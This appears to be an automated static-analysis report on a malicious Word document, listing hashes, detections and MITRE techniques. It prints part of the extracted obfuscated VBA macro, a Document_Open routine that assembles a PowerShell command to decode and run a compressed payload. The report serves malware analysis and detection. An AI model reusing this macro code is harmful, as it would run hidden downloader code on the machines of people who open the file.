Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c91bc5537d00905a…

MALICIOUS

Office (OLE)

Size: 244.0 KB
Created: 2018-07-08 20:47:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 3877d1588af44275393c41e4c41770e2
SHA-1: b7f4204e4818d8e66907fd60edb921f111c5b96e
SHA-256: c91bc5537d00905a4c188eaf8a0ae5d7f06a874c1fe89ef15633c78df09d200e
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro's Document_Open subroutine executes a command through the Shell() function. That command is built by concatenating string fragments into a PowerShell command that downloads and executes a payload from a remote URL. The ClamAV detection together with the Shell() call strongly indicate dropper or downloader functionality.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6605015-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6605015-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17401 bytes
SHA-256: 75268f557293e5166b79613663d331b1b20b41a05795ddea9aec0a4f873cd4fb

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "HjpiksqwQw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   qBEEk = 80713 * lFqdc * (44927 + Patsc)
   aFWcN = 77619 * mJAkY * (53615 + fzCLR)
   dimjj = 21065 * WPdiE * (3724 + tlhVzi)
   ADKGv = 8695 * QWITpw * (13197 + JEXwUA)
   FtkAvN = 99901 * iATthX * (18269 + TFNmD)
zCrZXkJiRz ("" + sAjlVOF + vqrkERXd + FIdjVd + vCXHXktCKrR + ibKmQwC + kcsvjPvWkz)
   zvRcm = 79863 * PSMpR * (51093 + oLHwKc)
   IzWbJC = 85242 * Bptbh * (33202 + DNNfz)
End Sub


Attribute VB_Name = "jRNPwrJXUfOkCb"
Function FIdjVd()
On Error Resume Next
BNIFwt = (17117 / AJkjfZ / 97879 * 26505 + (WYjdc * KHctlz + (SEfOW * tlddbT)))
   PVHAN = zTjTPY + wwTzXq / 79748 / jERCOU / 74583 - vHKwbv - VtXLNz * MzzHv * (JdEcoR - RqzzTK)
qzFmJWD = "pow" + EaBCMwGz + rIrSFGYziSD + "e" + KMUfwYrD + BuXFtaLWEzNa + "rsh" + XssvKsTIXQ + sTJboXTWqXhBf + "e" + vwjwkluHDf + jSsWHODhsMdJp + "ll " + izKrQkV + nUGEwLGv + "( " + nDzBamcsiiV + dhLHsofI + "NEW" + jjnHzjhGhQLTBl + EnsrqoMNdWmE + "-" + MWcJORnf + zbnKvJfa + "Ob" + jrPTEuWZ + wctZDprsWhz + "J" + jtOACSTr + FXUGIFTuNAAMUi + "EcT" + GRnEbKKj + puUHKlkjoC + " " + jnCmjYKWZjmv + DHVuNoa + " " + ZaFpPbotL + iABoblWJAI + "i"
vIhdL = puIBXd + djuul / 74775 / XnTCFj / 36858 - RQhGSA - jiwcz * cPhdY * (zCbOPW - BHpiXi)
   drTQK = TCMvI + FvYmZh / 8791 / ZqCSk / 73570 - CrDbwY - zYNMN * dAOSG * (aGjDEp - FompAj)
JziZiVA = "o.s" + KJUKOwvAY + nsYbjMCLtS + "tR" + lYTUNiMjpELpFw + iKjirWmMPK + "E" + iNRwWKimvbiRM + jjiWkPijjjK + "aM" + lHFCcXCbn + vQJYDcRRJr + "r" + joVZvjiOLCT + VfpofCwTPbUFK + "e" + SszXibZO + GvEwHszJjhwcci + "a" + MRMBTlCb + EvRMwRiqZ + "Der"
VHiXwa = JpPTib + HBEfU / 87116 / BooBsW / 69791 - tmFhPr - iiWLF * GDlMp * (oPdLEN - TSuVE)
OpipjMjtamU = "((N" + wdNBMYwXaII + ukDpCZvQ + "EW" + ATAXqjISItn + XKcZqrDDvaE + "-O" + qfBdROjCMhMA + RpAuWjJfiZzEY + "bJ" + FtvwIsdQic + YKdQYjDlNvf + "EcT" + YKAbiMpTiHnRC + oYVSzFlVBJaVVb + " "
ONJkh = pAPkKt + qwWkI / 94731 / ZNkjmp / 99896 - DrTsU - ZEtOML * VCMvrS * (KEkMd - jAcZz)
   WzYQRZ = RudWv + FEKYov / 44523 / HwGHPz / 27757 - bURUj - YdwdS * tPbNR * (PfpEkC - nPwRJ)
TauFA = "I" + sTJFaBsjhbKcJ + XsqWkiiXjOzwz + "o.C" + mbtXBwRI + WzIcZZLrXaZTf + "Om" + JwZqbFvG + jjluvGkAjNjZu + "p" + nEazmTvDQrArS + bsnnqqazbUpT + "rES" + XkBQBoBVHiV + VDvORlvmqmH + "s" + NHwizAvbsHwbRa + lESCKFu + "i" + XhEqjzt + auWclUs + "on" + vwnAKLjFioQ + MSYaTqlM + ".D" + dOzpjJT + HdwjTWWt + "E" + PEjOShDDLBB + mrJmLVwvO + "FL" + jiOjFDwz + uAzzjIfGIwHo + "At"
LvrtTZ = 80992 - QcBoU + cawFnU / WFfGCw / jirzUE / SMASz * (VZjHLX / VHWvK * 56927 / opLnQc)
   hkDUPR = 19751 - zmntQ + WXufZZ / MwmqJZ / BMBXfi / wErHGK * (YIXkdr / ntlCW * 23631 / oQdFr)
   rJkLX = 25424 - AOYioS + zHFEq / rrLmiM / oGuzs / CrwSk * (OEtmY / sqLJA * 83717 / ziUAw)
bUDHiDBAc = "es" + lQNiEYTDXTOh + PGjiJNSPUJVXJ + "TR" + BPchmXGWv + UqNjIfjAAXZIYz + "EA" + wEMhOfpWDl + QJjkvOs + "m(" + kBqqJmq + EiTBKRi + "[s" + oArfWfijrno + GqTLDWqF + "Y" + uzhQiPwSCpiEbK + LMZvCnsucdh + "st" + MPavBzipO + sVmYbBOIFZ + "EM" + fzwHEmoFhzD + IIaNWowPFC + ".Io" + UTaOYtp + uwEpdCaqmtRv + "." + tnvjkOOau + jTNqIGO + "m" + NKWXtmVZSJPFW + adKFmWTDojtj + "eM" + imDGJFj + qzspIlzBNT + "Or"
sFSnco = 77178 - SuUiUa + dMJQq / Cfjrz / ZOsvId / qfYHIc * (iUIjqO / FwpzTr * 72102 / ZmwfJO)
   fwJCR = 87499 - hnzDI + nWMwM / zJEUHt / LRpijP / kzquEs * (cjkqu / QVOmCA * 47534 / FacBIk)
DBSQCz = "y" + MEjjpEFBoJUiWA + zTPCvplCBFmL + "STR" + SRtJUlhvQ + wiiQHCmvwKvB + "e" + WSiijSt + rDoMjPADCW + "AM" + KDltCAQjHWPWGz + NhbqaIr + "]" + qGfvHsfEF + sohSdrOUn + " [" + iwzqVvb + LYaMukk + "c" + kRBlDLYzINi + ZAkXjwQXkc + "ON" + DUNUYsGO + AEztlSV + "vEr" + oJowacWBl + AoSczqKi + "T" + bffWAfapMw + OuzOVnsCqUikCM + "]::" + tuHrDtMiIb + wLZlFDZYckVWlh + "Fr" + BvUotEwR + uVhVGtOw + "omb" + vsiwmNsJZlF + GcNHlDrPH + "as" + JErHibIpczKIQV + Mn
... (truncated)